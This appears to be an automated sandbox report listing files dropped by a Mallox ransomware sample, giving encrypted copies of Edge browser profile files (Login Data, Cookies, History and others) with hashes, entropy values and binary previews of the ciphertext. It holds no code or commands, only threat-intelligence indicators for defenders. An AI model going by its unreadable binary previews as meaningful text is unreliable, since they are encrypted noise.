                    Preview:GG.4X|..WkM..+w.^..v)\\....67....X......3.i..I.U]./..........}.EKSD._ .B...g......sO..4.z..........W....+c....u..x.T......um..";.@....S.I.W_.~.&;..=.5.P[. ..R...-?..`...........,...-..\>k...............E..$..e...}..._..6w6...ES....E.....]....w.pT...ps....(.^.u.N2 $.T...C...@.....0`..=._....LF.rdgw...1..6..g..N.v..K....L.\..o$.......T~_..}P...;K.....NP.zi...(&vj;.[.l.C..FsT.<a+....fr,SV...q.+&.m...>...1.....*..=g..@.X..7Q...t:.........Sz.[".3A..u..r....E).^...].!...f...t.ZI~........+..}....m}.`..[.&.9.zY..u.i...>..#.....Bvx.lx.......W.....V.We.m.x..K......hr..,.S".6.4..iP.*..k~.\.03d@G.e]=}*.UP....5kdC8.e...M.L...c*<V....k?F..4...G.z....$.Z.,'...... o.?.B.tL%Mq..5\.6..$P....}.u^v....}BM.\.;4.|.w4..h<.Cj?.j0x+...m!,...eG.Z%.`.sX.H.b^...m/%.o...%..n)......$...pl..24S^.f.na.......T2...6\!..b.E.,........L.p.B.[.........S.:.|...EX....I#|.........9..N....Vk"..Q.<k!...Oe...;6.]..m.Fl...zz....yU/..U7A.2SM..o....|0Zy^.&s.M..q..=...H.W.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Favicons.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.990338024003255
                    Encrypted:true
                    SSDEEP:384:88WRKK5zNpnEslBePV0dCQFkRocQiHcGDqoPgHsBVga2cVD9ULfx:6RKozNhEsbet4F2oc1HnNcs/37Ojx
                    MD5:EA1BCF87352B4C0B4C8EDAF8A9B36B05
                    SHA1:9685A13469C87E7B02864DF62665A0BAEAC6F334
                    SHA-256:2DB58493CB199290C57C4C928996D1CEB0343B97E35D138A3B07BC89CBF40DCE
                    SHA-512:E5F0AA85C38FBA2E7971449C67FF8C6609A63E31EAF5FD00595A2EB2B4E17DC12EFC3FB6FE55B8EF17B7203C33DF2FAAA328B247082A9969688A026EB14A742D
                    Malicious:true
                    Preview:..ZX.p.l..-.......os..2...s+....%kG....3l....c........G........C.8....e.31o..,U.7......G..%6"d....(...17.5....:..T8.Kj8.m.T.(..:5d.,......6...A.f.bMy..O.].9.j..u..O.9.#...2...+.m...*.c.*&....,F:kQ.H....v;..`@.\IT......Z/...E......{N....U....u..)#.2.............E9`..Ws....;}.b.....[3yQNF{{DG.vUj.w..?{..gn.R....9!b.0.|... .qf.!C*c.._.}.......... ....}7.p...C.\.j.....B.O.......?...q5e.f.z.,.........'.....A.Q.o.iV..l..#>.;..Y.2.>......C.....Q....MP..........x..`_a......e#..1...[.i..5.x..,.......-....Pk.Q.z;....h....W....1..>~....-..`|!q.k..]mT..2.....eu.AF...`.0.EWl....R:.cU.N..t+n;..;c".s.q.F...)..#...(.KAb..0.L#.....b.J.'P*.s..[......p.{..S7h..7....-...)U.xTF,..:^.;.1q.7.K.d.c3....f........9.).Z..BWn/Q.........A...B.(bTl.....!....JV.s....hI,..z.P....r=..qNYE.....YA}^=....]...g.......&.s....;.....).........H...m6.......U...C"..R'....!.\........+F0v.;..g`\....KY.._P$.0q..q....}.n.. X.....w..(pb..........T.GI~-.A.A}u......8.z3.....N%IZ.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\GPUCache\data_1.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999355976840866
                    Encrypted:true
                    SSDEEP:6144:/kiBOTv/++vdAT3Svi2oWVCz7WW1zIycm59S3Gs3kfQkX3W5:/kiVydAJ/iW2bmbS2sMHW5
                    MD5:EDE6C4C28731E0CE226C0E131057FC2B
                    SHA1:A20889CFAF5C503B57DDD62B672A210D70F4E73D
                    SHA-256:DEDFB5345C31C3F4817389BFB01F6B407A43B1F3C9E840F6C5CDCCB3E4E019CA
                    SHA-512:1E83D03DCAD136E5C6FDD6C2F4F9F72D69B43364059A065C259DF7384683ED3C840AAA1BF7F489A30EA009A433E0E153B964025E43C8C9ECBBCA42D3E395399C
                    Malicious:true
                    Preview:..w.u&...L...`..\.....q...c|O..+.+[.c.......2.|.B...'ys.e.a-..A..*......x....9.......(#..Id-.......2...)....\.MV.WP.......r...\.......X>.n..%.-.~.\.....CZ.:.Zj4....,..R2.M.F.e..v..=q.......F..z../.>L.Q...f.G..."O...a..*JS3..K...p.xp...jZ..`E...>.x..}.n..nK.."iP...k........;$*.&_..'..G7.x*k.:.o<.*...XKSE7=..$..5...pl...f........E).......D....s.6..W<..Bo_....l.a..4..&.t.O.z.'u..4.0..#[..R.E:...v....1.....[....w..|.Ff..........".....D.mbMP..RB....r..........5.E...aM..*.p....`%P...~..!...Bw....O.....z....D.R....u.Mo..`... N[.......i.fQK.P..:;M..yJ..z,u.>4I,e.\..........oR...3...+...]......O.}. ....Sy....'5..4}..S........jg...88q..5.?>.FR..2V....YJyk.nu*Y..X.&...G.....[..3....q..y ....d..V..-m.....<....C..v..b?C.e.8....`..^.FQ.... .....}.......{...h..<..,I@.}...k.>.......G.L}.HN............eR.~...L.....7.p........E..o.....7V....n...0.t%... K...m..*.+.^..c..l....U....{0._.n......@5.^.6........W.B.RBd._.....\....._.`..r..-.xb.X..vq.TV...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\GPUCache\index.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.999292211530283
                    Encrypted:true
                    SSDEEP:6144:SMAO+X7NeO0YTmkxPvK2iD7AQY3gYYGLg3qhKtBUNm1PaIpGO:jZ+XZe6aGID7LYQRYHhSUNmVrpZ
                    MD5:13DECEF450DBB02FD3C0F430B49FA745
                    SHA1:98CF27BC1B1C074C655798D89F136875C3D01E78
                    SHA-256:F04FAB32974F97BBCF8D80A301684A980A34DCBE772BA604B462B09003C8A1BC
                    SHA-512:518DF800D137A78A8D45355B268DA0D4F06F46975E2822B6FA4BCA3956003D403D70DC0C9E4B641CE5B8B6B1465AC1E23CA1EC0CDC00387F9885E66957478A28
                    Malicious:true
                    Preview:.....SbL.k.+..a...4.[.O.i..W..."....7z.~.0.i...T..&.".....p.F..T....b@...It=N.X..d.h".c7..1;4..1.~.?.....N..0';*...Ti..........h......R.4IcB.7=.og.^......@....p...-...U..]......d.n.R(\.DLS.Iz...7...n4@...O...l^..Y..N...;.j1>...'..e.i.O.'.Qi.p.x......T..{.#..tu..%n....B.S?...........K.9.3..I....1k..|..#..H..&....LOh.C.$.].....f..kh.}.aS...Y....B91..{/>......kXv(A..Go....$../..o.&!6.#...5.0..W.g...DD=......9...3...D..m.&.ac...... ..N...!t......4.+M>..X..`....C.?......'....&u..W..6..`...<T0]b7.....M...+.]1b........BS...y.:....P.=W...C..L......b...@...3b...E..&..LP._\Q.-.BX..R..Y).gF.<...t..(...A.R*..u%.X.0...eR.~....3......vg.k..Z.T\.....b.T.mo.i.S.....)..tF.1....C...VD.Y....41.YJ.Zx.(.u..(.....F..r.....[=...3._w.T[.......2..S........mZ....I..l..c9...'..E..T..c. ..b...t....~....V.D.P...W...(..9|.V{.)..;.rd/S.b.(......%o.3..z.....8..3.~......3..X{..H'...Y.\.3.T..c....Ru.e.G.y..k.f.I...C....)..C^c....L.h}s..=.7..vJ...0<.!:|.`..X..: ....3.S

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\History.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):155756
                    Entropy (8bit):7.9988212008255895
                    Encrypted:true
                    SSDEEP:3072:B4QkRH6TIs8sZCGi4EVjXiNU9bdRHVPI72N0vwL4fUcbf5uq48:2F6TItsZvi4EVjuaHVw6ow8fUcz5ut8
                    MD5:59D9738FE3F4263B254039075C98CFAD
                    SHA1:18F369FF4BD502E74EE980F9286EB4D77528F71D
                    SHA-256:FF3C6B07A39498E89C33222F6DE844960C213F3201E59D36F50A48BB01BBA9E6
                    SHA-512:F2EE60E6997EC8D9ABDF5DA623B79BE54F349588299CEBE5023F7F6F28C3EE4BB6FF431276E7AD6DE53F5BAD5D2791A8256FED20CCC6F3F8B96E1D6CB8897ABF
                    Malicious:true
                    Preview:.........<..7.o%...#.>h...[.lE.w...\...z..x..".l.....cy9.....t'y.C.......C.y......YjZ.Lk9...z.........8.f(0..D+._.. 2.~S....#..W..~H..b...8..$OU{.....7n....h3.....CJ.i..U.X|..x.^.Pv..#1.....A...9R...{.v.&...F9...^.x..6..'b.9.z..na .N..3...o.1B.Q\..G......A..X04..",.........X.^.M...R.U.>NC......w>%....p.......vn.1.$.Wf....Xb...`4.....'.T...V$...R...*.F>P<.F;...B'....X.k.x*.SR.U8....<..2.7...d..iU.fR.'.."..l.Zr..;.q.}..X.......S...si..`=.....e..ciY...-h..w..\...k.......d.....u..pS.....!...$..m^.j<.s..".Y_$.T.z..8.0M..nv...3.Zm.H_ir.`3{.....S.=Y..5@..RJ..CAL.p......%.^.....b.....E.d.Q.L....\..........-:>..]u.!....4......)...@...X.0..2..ice.....B.G.]+.v....]......)r.c0..=..|..j`iYg.R.}X...Y ..|......`j.?zw.vr..:.XkI0w.....m`...9......|.) |E,J...%...L.k..].\.)k..L.U.hU..0..e.. ....op..]..A.A...5...4J.......*....+..~..J.X{......z..A>.F.c..S.&....h..........SD.8....."...,@..t....;..... ........n....G...+..z......T...x....&...A..Sf....V..U..7UpV...../.-

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\HubApps Icons.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):28780
                    Entropy (8bit):7.993702967302249
                    Encrypted:true
                    SSDEEP:384:Bk1qlprGtdZE7QsUe/MeAo8f2tRB4Z1kgpznjnnogCDaWTPmTfKIZmO:b6to7l0eAo8fQ8znrmaWTP6UO
                    MD5:F8F88225730D51D7A2D4C80722D88EF4
                    SHA1:AA604B2C16F5B84D7603762E1F080A20EB6FCB4A
                    SHA-256:BBDE3445E94E13409B693916C9B0DA1650C07389644A62F8086C92B0F50D4F87
                    SHA-512:FE345B9CBB9BD665B3C380C4DC337F795A9FB9D50241D35D1E7D16159CA98146552AF263D9D7CB6C70AD0C5A718620A623258E0B1CEBE904C612084907D35E9C
                    Malicious:true
                    Preview:...!.lF.....M..Kh.>.n....Yl..b..jh..^.....qzF........oy...... 2K<9.,.=.1...Sf,.......0$...Q.A.m^...v)..Q.7..J....=..?...N...Yb.\...X.\...HG...........R?w!..f.f.&..Y7E..}..k....c..ic......<3...y.vS..9.Vg......+N..............{....6..~...g.....}.^%e..E!..."..:.-..fV0...D..0Pm....,g).*.........>JP..vh.#5)...0.W|.....q..Uhm.U...Q..x.....U.....G.....-.....pqs.. ..(F=...:.....UI.K>..R..$I..F......>.4.....+PS7].jQ.<.].$..d.a..m...cS...._...R=.s[..n;..,(E.G.lr.=...Ek8.). +...7*cWiW...+.$.....?.LR....+g<..0.J<..lj*..r....bK.K.Mf.:...!...yXlt..V.ZR..(..+...'K%...<3..<..^.G.[/.e....24C:...PP}S...2.....r.@.-.u..Xx....BBl.....W...~.?s.=97%.....g.A....3.... ...mE..S.Q@....e.2.Dr...w^~n.....8......Z...+}.o...../?;....#"...I@..@.?m.e<....c.o.P..So.........v.u.g.S.n....T>...9u.X..x..........:....S.b....2...hO...o..[...W<'..........bb....+{..8.^'WH.a.....i..y.....H...)...O...*..6;.h4..c~.}.7:j.e.....ME.<...#.z./.fT`..3......8..iyO.%....~ .e0!...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):51308
                    Entropy (8bit):7.996612632671921
                    Encrypted:true
                    SSDEEP:1536:2NBZ4z6ThVRpz4ZEmC47Wqqphu7LblkPVl9a:+4+TzRpzasGW1pE5kPVza
                    MD5:BFC4974F70C08E4AC0C63EB872D350AD
                    SHA1:56E1674EE007CE2306604BECE41BA029B6049080
                    SHA-256:8389B3F03ED136000CDF7957244598457AAFE4DEBF471FB1BFA748D12F55A84F
                    SHA-512:BFB78A8551F5891C01EB3E9B1F17C5BB49D27CC50BEE2EA12CDCA8FC2FB01DFE2E69B2BE99418633211D708CD00C42D0A711F813C15EBEB89D37109523BD3AED
                    Malicious:true
                    Preview:....'.k...b....d..a..Px......;t*.,G........,...w...2......&...~.7......n...].j#.r... L.+.E.W..#....C.h.....5n...@..6..G.'..J8..1V.~Z..Am;.)$.Y..u.$.8a..:u.A.A.M...$.....r.K.$.....7....t.......V.q....r......bL..<0M.I.....NH~.:....9.F........Q..#A.,.......f!E....GJ.....b..].W....W...q.q.t.....\.7.]P....$&..d.".....N..}C...'nG....f .cM.@4N...Q X}..>Z...~R.....f..C.U.....L.$S..po....S&..b7.3..g.kB6.58....]........Mw..]......V.1..!{...!:..R.N......-.I."M.F..P;^b._.3.t...b........r{Inz...lVQC.....~.d...nC.}qy.........>.l..JO.O.s....B5..".....,5.3N.......}zlut.3Q.>>l*}.>8[.<lb.Y.-....$zQ|.<...|..........N...(...}.u#.5.3..5..!.@k.ci...Fw...&...k.Z.H.d......[@1qgR.,.>4}..m..B......pt...;\.4...D.3sF.....X-.G$..I!...Q..'M...g..2.."M..Aw40.Y......+.......).V....H.h.7.5,d.....c.N......[..h.@....BPS.0..y^'....v.....fM..\....S>s.Y......i}..O..\...Q....e...;..<...8..[..._.|j@m^.....Mg....O.)]P.]K1.FZ._.e.a[..|U..k8$. ..[#*.Ck.d$..E......AEPs..ut..?.)......5...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Network Action Predictor.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):45164
                    Entropy (8bit):7.995805848647011
                    Encrypted:true
                    SSDEEP:768:02l9edslNYRafR4MLkuQ6OiV3JTMXSKCdyL3bqK14TNgLQiJh1KzUS6J4AhQ/1/i:02esvYRau0XQWL7KCEL3+K14RcQK/Kz4
                    MD5:A23BD91AC5532953BF180326B382B05B
                    SHA1:AF21534D16B30B47A9877C07E000A188AB4E4FF3
                    SHA-256:9239698560F851C67F4925EAB31AF75570616E92BD44B604C82563D07B05B35A
                    SHA-512:F826F62009CEB43C07AF9A8138F82378F60ED577AB4DE391EF5DB3C5900C13CB810A39318A444053B62A2020AC80FF28717DA5275594D9D1126FEE07C416B276
                    Malicious:true
                    Preview:..].fi.@..W.~(k.....^C........p.sB..+...NT..z.r........A.<...& ..lE..},......=.6......5s.... .uU.\.....U.b.B.R.......q...6.........8....D..b..E....i.-.k.....+FY.@.....aR.FzD.....;oM'ni.WE<...L...?.B..... .:....q..z.l.....Y.U.w^^SL.......S.d.1q..x$'.lBR...>..1.-..c..h..X..?-.ULI......Rk..(7.../..Ybh..8.k.$.3*.;n.!B....\B..+T.IA.z...S...:.&....Z......BA.^.U.O....a.s...e.k......e..S.2;.....M.".h...^...O1.....wfI p...u.p1|....?4-..,...e...j.K...{....#3....>..cL..,B...w.'...*...;?.I.).*...s{.g.,g...$.#sH.RP.I......p.{.....R.k"*.....n.0..$>.......J..H...-{.t.....T.Z...v.N.o....kG...N....E..E.:.^AWY...F.?...m...z..(M_...u.T....A_I.....&h.]...R!..U...M.9z..j.=F\..Dw..`..Gn<<f.....k..Q...w.&<.....} .......;.j.!....y-rH..@l.......'.".S.:Y..BR.v=.:...n..Q.j/*._\......+wR....X.!R.3.?GZ9li..x;.vw.1......t..K...>.b...$......%df.p(..B.J...^...g...._d.....g..!7..?..Mo....'3j!e..*...lG..O.g...R..R..C...NKL.Cx.U.Qr.._...m..."....^...OJw-.y...e.6.....`....+.'..'..'

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.991282879296019
                    Encrypted:true
                    SSDEEP:384:sLi0e0J8+IkKp2nIRzlwarreEl2wFpED4W86e7RxpQ6C35Mir6soeo4O44Kv2qqa:sm0fJmp2nIhlXrJID4W81nC35MiOb4dt
                    MD5:7BB9725321B1FBC5AA61BBD86E24CCCC
                    SHA1:4D4ADD2D26403856C4CDBF54788F2643F57C82BE
                    SHA-256:2789036A4CEEA4BCF984DF2D874D10ABE0D460048E6632B7CB8C683CD98A1D07
                    SHA-512:DC9954050B29696CC37FEF8BF6EE8598BA3307512D3F0BFE6B522A46BE46A33762A673F2B0C662B0547E26381EFBDE5A6FEA27DB4335FC809607474AD6756A91
                    Malicious:true
                    Preview:).....O(.HL....67-.A....K.;..V......ts..=..?....Bl..).#4M.3...^..m.v.e0Z..Q.:.8.f...[s..4.Q..t....+8.qQ....g.K.....r.tR.#z.Wr~...ADe...o..'.kO4.......\.....3_;.. ..-..Q.*.C...H(Y.<.f.n..%.)r.eks....@D.8A....f...n5e..#.....G.s......E.c+..WH>Q....5.LC...ChF|.;...{.....q...w.L@.....5...Q...T.[++9I......Aq...5P.B..i....H$.F....$.7..201.......7@h.r.Id.....z.."Q.y.,..0u..........g^..j.....A8>.pI....p.o...c.4..Z.p`.4...".......S...ZvT....Byfi..FIq...7.<..3\-..y..&...`O!".D./.....|.b.M..............C..0.+.....,.E/..]..Z.?O...5cw.Xf9.....d...n.....*.........W...}.....n..J.\6.&l.i.Xx.x.y..I.1.V#fL.%=..19..h.c......C...L.g.t."..5.ba.8. ..S.,.L..=.X,.bez]..r%.i-J...o.&....(.5BY...tmB..L...V.u.3!.<..f.r..#...<...Uy.l...."'.0:g-.q..q.l.H..1py......V..}i...;......|+.T.Wz.Y.v...f...[..M.$i.....P.tf.....<2.V.l..=..H.. ..*......8e.X....lx..ZA..J..... ..]6...:..uTyX..6.9..{.....#.=...l.9...#.f..B..Kha.....*j!..8.f.j@......1."c|.4.'.qM..c#...R../...4bpuGc~

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Reporting and NEL.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):36972
                    Entropy (8bit):7.995443379459639
                    Encrypted:true
                    SSDEEP:768:knUnmWfaR84Lw263blWCIzBnB4kVNzZ1ABddVy/YGsxXWB80iB:kUmyaHN63RWCa4kV9YBddMUC87
                    MD5:21337FF62BECCE57A861CFA402484212
                    SHA1:CD24948EEEE43C7BA2B1B83A7A9421A9D3E74A3D
                    SHA-256:03BD8DDA74B38B8B5261B2092DA506A4BF7EEB3A42BA40793859D0A945411D5D
                    SHA-512:BB9147D615266B4E90DFBE8AA79D90C22EBC40E2C51E1FC9DA932A940EA71639D6F634E4B9A46ED42974E77892E803CAD0CB75C7EA867466B800BF4DD0DCCB82
                    Malicious:true
                    Preview:.t...H....?u.. '.....T=Pbi..\4. .I..v.\....#B.x#.}.;..._..>......"..X..e..>Ez.;^U.b./2[.0D>7..}F\...q..<).Z..N...q"........{.tff.B.3..!..hQ.......%....."a..c.<..Uo.P.p.p...~...9.N...k...4...d-...`.K.].....I..X..........S_VA4L..C..$..7..I.2..`w.F..5*2..@d.}.?..I.*..d...|".."...FfI...o...f..%...S.+.......qg...02...k...I..d_..c1..sU_..S..9.j.*85.a.y.E...e..q./...../.-....g .$J......o.5~C>.......h./.......$..H...9m..]Z9....}f..xZ.h..r..k.....U|.b...T...,;.d)...db.c.c8u....>.vUEW...KOy.wN.......+.S......U.N.)....?.B..Y~.I_....G.d.5g.......z....T.Q..C._...L.k....6.D.:.3W.O...s.?.4...\do.&.q.*..U.a.....T.X...L...)...WeMrg....h.z.l.q...}..o..a~2/....;..)...n+.{.;3.KY..O+.'Pi..8........TF.+{56QbG..q.D.\..f&^vm......gxzC....I?*+*...h.>`.Q3.K.....-.!.E...$*...u.5.B.+.g.%n..]-...%..=5..l...O..t..L.....O..X.........G....pS.9q.W.qUo!g....:G...9~e..K^.........x..Ym..E...SV..{k..~....b{..!'_.V>..N.#.^<x<....{)o. ..1...^z.....M.s..Pk>.L}O...0..nL].....X.).

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Trust Tokens.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):36972
                    Entropy (8bit):7.995211183517574
                    Encrypted:true
                    SSDEEP:768:WWeq4cWuqhAAUytQUfYwCk+Q954/pPi1v3l7me:WWz4aH0QUAFQrWi1vZb
                    MD5:4A21CA30603BF9988B9FFE0C4A7E6225
                    SHA1:40862D7EC68A335913B2CE9E04AAA921F591F615
                    SHA-256:77EDBD72A7C84DDD658712C2FDEB98A1C6E88F1D58E8D1F14E12AF0D5C98ADF7
                    SHA-512:D9BF33A518936B9805B9009942278DCFFB2103E9FEC1D41784348E9811C88FFDFF5EC8011A1C66A9AA976BC489E5D3E454DEA22312969C6034109F78897B1397
                    Malicious:true
                    Preview:.../....I..}NA.-}B..."....4E..k/.F.....!M.....Qr.R.&.C{c..X......8_+...!ie}......%.7t...L.....KT....6.I9..]...P...Z.3.{..o......+...%...`~...x.Yy.~.Vh.6...h.1.(.E...T....;I`.n....(....2..W..b.4.....uQ}...xo..<.hd.?.W...2lG.q".I.(...x........C..f5=.......z..4.h....$Yc...../...z.'...'.n>.Q.$.F.....!..>e{.s.G.X.4,.w...9....b...~..+.w ......4......a.>.'.~.Cw.....)..g@.C..k.4..........?.h...64>_]../........D8R..hJG.~.@.....e.F.X2...N.].vw."...}..`@..V.{b...j.......U.~.i..}9%...D.2.c........Z.C....d...4.T!.......I.....W..2.).#^[...m.....t./.......N.-c..[(]...A.h...H...... ?&~0.&6;...E....d]~..$@N^....l.SG..-.T9v.H...f..^[..}...0..pP.>.I...@o?J.8JQ}e~i.......J..'8hzS'.Z..q.....7jfO.$.J.NI.^$n...V..Y.f..C^..`}..4......1.A..\h.@t.kG..d..E\H.a..J......Ar.=Q.6.!0.T.?Dr../l.y..g(F.9..i.......P....K.(i>......2.~..K.\.zu...l..W.....N0..rC.VE}.q.W.H.......9.......s+O*."0.vOm.0...N..J......9."u....%S...Cr+.7.).....X9.....,..~X.4aw.}.(t.8K1b.....K.....?

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Nurturing\campaign_history.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.990838888135924
                    Encrypted:true
                    SSDEEP:384:VGXvihBK4Iol8XHEBLcclHESmZNQ2sBgS697tOcoJpiSDOfRk0OVA1:VSijK4D+HML3kTZUWSAB+DOfRt
                    MD5:5A909C7BE512F8AFAD0B6B06E4EFC864
                    SHA1:C5C2C5760CB8C2D901B15D92BA09121190314D69
                    SHA-256:278648863B49B0B9C55D50333A2A723615A4CCFA7EBC9ACEB5386D5ECC7BB0B5
                    SHA-512:9E91C5A69EB7A131166A8D3B65D8DD40191F428FDC8E89F3A6B2DBE422218F386BA8413E6CF1D048B89998DF517758CBDE9F72C6EBAD6FF1927547A6EC2C3E67
                    Malicious:true
                    Preview:?v.C.....F.<.*.,.xx!.Y).p. .}..z.\...Q}...J..^.5...=.9V.@m.n..L.3........h...[j}.....[. ..]".q.&...@ex.mF._..F.D.......z.....@s.1bE..Q9...^....s....4c&XQ.+e.......o..-..HQ.El..h.O...W.5`.N(.qW:.N .....}R;....c.?..J.^Q.>..%..7.{>.=.G....7L.......&..L..&.d..+.N.h........Itt]..EOy+..Sd..u..9:y.'..v...W .]...qF.qJ..6.x......c>@.q..#.I4W....]....'...0t.Q.......z.....d{.,f=.-+!uFf_.YU{...u.fT:*.S......4}..bGD.tD.3x.F`...6.......-^.l@~.7.*....s.CP&.\.'Dz.e..|....j..k.1.....T.Z..r...#d...9.w .....K.....|...Xn.............=y.48.{k...hI.&$.i.d...il..7....=.T..^.B%....LA..0.w.3..z.v....W.CB=Z|.J...d..V~....:...j.Q/Q....K..;..*u~.+.>.J..".w9...,..$...U....Z...C..;.9...x:.,*.H..`.R.O.l?+......!.z..%C&;....?8...9f.....~.XE`..H..j1.\..=.f>p....{....Fy ....H.@..T.Th0......zS......rq#.\?.w.$!....P.1%..Z...u6*{.........4..%.+..+D......:.}E.Y.Kl..6.X......<..j.!n.=`j.#p..l.M.3.....Ol.."..K....fZ..KU1E.....V.MQ4..Z..[&.......X.B...[..=M6)...v.$.C...]Rg..Il

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Secure Preferences.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):30184
                    Entropy (8bit):7.993753900034707
                    Encrypted:true
                    SSDEEP:768:ojtk4UZPvapIVyLZ/rsjy/ga6ditZqm6h4:4tRGPypIVyFDslk9V
                    MD5:3590A811AAB10C84BDE7B499D66EC4FF
                    SHA1:921738B115CA456616C9BA768E5809F4090F5534
                    SHA-256:8D538D662A48557456E5D4FDA143D56BEC2751E12F5668E4DB10644947F0040D
                    SHA-512:EDC08B6CA8D63AC9761EA3A1D7AC452D499E794899D5C67FEC038D579A378907F739905A18054A840C1E9CC0949127CA050EC39AE77F7BFDAD26C7504F528984
                    Malicious:true
                    Preview:.:....eB..Z.....\d...<....}.4.b...i..N"}X@.z.'.......^.3..oe.M....b..2<...-[..b9[.N..W.M....w.v..r..!..ef.P.&4`...S.6...W.]...jRO..Y.>.h^.{.v...-..%GsX.....5..g..E.p...u hN9.+..JL(.U.....=.......".].....g......b..v..m...C.....{.l...x...`cv..+4.Eh.s@H0.....x....jV.4...r.......<3j..?y_o..U..\...2.y..!...p.H.....%.e.?R...iHj9fl).J."...2.b).1.....KH.t..E..[.U4....z~E}..k.|4....".r1.^....xp....)...0.n*.I|...a..........<.. .....v.Np.Ag.....:...........)..z..66>.n..m.K._..6tLAR..q...(d.W.-w...=s&....9[..E.+...>..+V..{..D..r.i<.....}..d.-./E.....wS.i..n.dqP.6>..@>.^..jRd...a....=.....xS....0^?L.l... s....^!.p..d.I........l..Q........y...p`:...f..NT.>_".QKPn.W..AR.....s.s.;..CK..l....b.-..Ug....\..(t3`$.RN).0...Mo../R.#..>.....AI..D.?.Oz...$=.M....]....t.....q3...M.G..-.....t..U0..Knh"U.-._..|.=.?......Q.q....../........C...XJ.B..,..A..l..S.2Z.p......).}.O.|.....9x....0...l...p=.>...T|..|.....s..1MT 7......0.......'...t2.V&$JNk_....]...c.....dB..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999379902288092
                    Encrypted:true
                    SSDEEP:6144:HjSmfqNxCt4S66aDqv6QT9lY13qzajipmYTPgNklhpo:HjSmQCd19lLajipmYTPWIhpo
                    MD5:22C11E51BABEA74D7F30FB18BACF46A0
                    SHA1:0A465A4A45F3669363FD85E0447D6C7A5FCB686A
                    SHA-256:40D5E3514865B04168310A98B97041C44B4476418CA7048667F36B6C005C22C7
                    SHA-512:C21FBB411306744F5612C06119C1A594357FDD9B90D09B3AA3F0DEC657B91DC0CB37D03DC89B3C1E443F5B64093218F175C1F3EFC4D3089FC7B43F6093FBEB33
                    Malicious:false
                    Preview:7,m.K.0...|A..Y..9jI..~..HNYg<T,2B..:...y.oJ...@?.&.b.6";f.o+.w.l.Xm..5M.k...I.F~v.........w..(NO..RR.*.U...g..'.T.....]8.#...... j..iggX...../=...`.Lw"..z.J.$\R.`?*....S.C.1....4.c..ze.UNB.....0...?.%..v.oM.t..M.u...!..+:.&...t.1.......D_..#........'..4.......R.f.SF...#....<p..Un.-Gt..{..Z$f...E@...ytI.N~..y.xa_"../%...l..+.2..?.BZh.....!..1...e..8Q....|dGw.....w..."i~!2.4.oXC{.#.nlN...iH#QIA.L.fu.M..V./X...@.n.0=....J\@(..S.t*..^Q......w......d@....G......F...N..h.....>.M....*.. ..?t5O.........P?#}.F*.b=.......S.:.......%(.`...e.##.t- ..5...i...h..).....4.5.\.S~..M.BM........3.4U..x.:,......+3..g.B!.=...h@..QA....T..NA*...5.?.A*.....!.C...u.?9.1........t4....;..DE..B.;.T[..4.9..W,....H.5...0B}<.W.j..e.A.....A..x.....C8l.AK..%c..G.5.i...w.R...+...Zc..&k.gC.{<6......Ue2y.A.....R.....T..M.....V..Kg.dY...>"w.#.kEY.8..-5*+.g.......@o.....SR((....v3.4....1h`..k.../.......l>h...H.}3..,..vuC...\...r.8..b.....o...Wd*..$......*Wz...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):524764
                    Entropy (8bit):7.99968495661663
                    Encrypted:true
